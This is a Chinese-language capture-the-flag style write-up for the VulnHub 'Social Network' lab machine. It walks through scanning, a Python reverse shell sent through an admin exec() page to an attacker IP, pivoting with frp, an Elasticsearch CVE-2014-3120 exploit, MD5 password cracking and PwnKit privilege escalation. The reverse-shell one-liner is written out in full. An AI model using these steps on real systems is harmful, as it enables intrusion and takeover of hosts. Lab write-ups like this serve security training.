靶机一：BOREDHACKERBLOG_ SOCIAL NETWORK

一、靶机地址：

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

一开始导进去靶机服务会起不来，重启几次就好了。

二、信息收集

arp-scan -l 直接二层扫描，发现192.168.56.104

nmap 扫描发现5000、22端口，5000端口跑的是python 服务

三、渗透阶段

访问5000端口，是个简单的社交聊天界面
看源码没有多少东西。

dirsearch 发现admin页面

访问了一下，提示有exec()函数，应该是python网站给了一个exec()函数的执行环境。该函数可以动态的执行代码。

那就好办了，kaili起nc端口，直接exec执行python反弹shell代码
``python -c ‘import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“192.168.56.103”,9998));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,“-i”]);’
编码后BP发包执行命令反弹shell。

收到反弹shell，判断是root权限。

判断是docker环境，靶机作者应该是用docker搭的靶机环境

尝试提权到宿主机，但是不行。

桥接的地址进一步证明是个docker。

四、横向渗透

搭建frp隧道，尝试代理fscan扫内网，但是扫不动。

直接传到靶机上进行横向扫描，发现部分信息http://172.17.0.3:9200 存在

存在以下漏洞：
[+] http://172.17.0.3:9200 poc-yaml-elasticsearch-unauth
[+] http://172.17.0.3:9200 poc-yaml-elasticsearch-cve-2015-1427
[+] http://172.17.0.3:9200 poc-yaml-elasticsearch-cve-2014-3120

frp直接代理socks5隧道进去，访问到了

bp挂载socks5代理，对CVE-2014-3120（ElasticSearch 命令执行漏洞）漏洞利用

找了几个payload都不成功

search一下kali自带的payload

找到一个/usr/share/exploitdb/exploits/linux/remote/36337.py
proxychain 挂之前的frp代理，利用漏洞成功，root权限。

ls 发现password文件

按惯例直接查cmd5，root 密码是1234pass john 密码是1337hack

尝试发现这个密码不是宿主机root密码
继续尝试其他的MD5解密密码
用john密码进来了

五、提权

用Pwnkit提权成功：https://github.com/ly4k/PwnKit